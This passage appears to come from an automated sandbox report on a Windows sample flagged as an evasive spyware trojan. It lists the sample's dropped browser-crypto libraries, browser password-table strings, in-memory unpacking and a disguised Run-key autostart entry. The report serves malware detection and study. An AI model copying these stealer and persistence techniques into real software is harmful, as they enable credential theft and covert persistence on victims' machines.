                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3392292376.000000000082F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3417574339.000000006FD92000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exeBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/22@3/4
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6CAB0300
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0093147A
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_0093196C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\Users\user\Music\AttoDesignerUpdaterJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: 7ZthFNAqYp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125180358.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3102837907.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: 7ZthFNAqYp.exeReversingLabs: Detection: 44%
                          Source: 7ZthFNAqYp.exeVirustotal: Detection: 44%
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile read: C:\Users\user\Desktop\7ZthFNAqYp.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeProcess created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: oledlg.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: k7rn7l32.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ntd3ll.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: 7ZthFNAqYp.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 7ZthFNAqYp.exeStatic file information: File size 5233152 > 1048576
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_CURSOR
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_BITMAP
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_ICON
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_MENU
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_DIALOG
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_STRING
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_ACCELERATOR
                          Source: 7ZthFNAqYp.exeStatic PE information: section name: RT_GROUP_ICON
                          Source: 7ZthFNAqYp.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x25c800
                          Source: 7ZthFNAqYp.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x214200
                          Source: 7ZthFNAqYp.exeStatic PE information: More than 200 imports for USER32.dll
                          Source: 7ZthFNAqYp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

                          Data Obfuscation

                          barindex
                          Detected unpacking (creates a PE file in dynamic memory)
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeUnpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00938ADE
                          Source: 7ZthFNAqYp.exeStatic PE information: real checksum: 0x4238d5 should be: 0x506581
                          Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                          Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094F2D2 push ecx; ret 2_2_0094F2E5
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094CE9A push ecx; retf 2_2_0094CE9B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00942EC9 push esi; ret 2_2_00942ECB
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00952715 push 0000004Ch; iretd 2_2_00952726
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093DF45 push ecx; ret 2_2_0093DF58
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exeJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditorJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditorJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,G